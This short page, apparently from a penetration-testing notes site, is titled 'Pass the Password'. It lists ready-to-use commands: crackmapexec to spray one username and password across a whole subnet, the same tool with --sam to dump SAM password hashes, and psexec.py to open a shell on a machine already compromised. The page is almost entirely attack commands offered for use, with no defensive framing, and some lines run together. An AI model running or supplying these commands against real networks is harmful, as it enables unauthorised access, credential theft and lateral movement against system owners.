Pass the Password
This will spray the password and user on the entire network.
crackmapexec smb 192.168.0.0/24 -u <user> -d <domain>-p Password1Try to dump the sam file.
crackmapexec smb 192.168.0.0/24 -u <user> -d <domain>-p Password1 --samTry to get a shell in a machine that you have "Pwned!!".
psexec.py <domain>/<user>:<password>@<IP>Last updated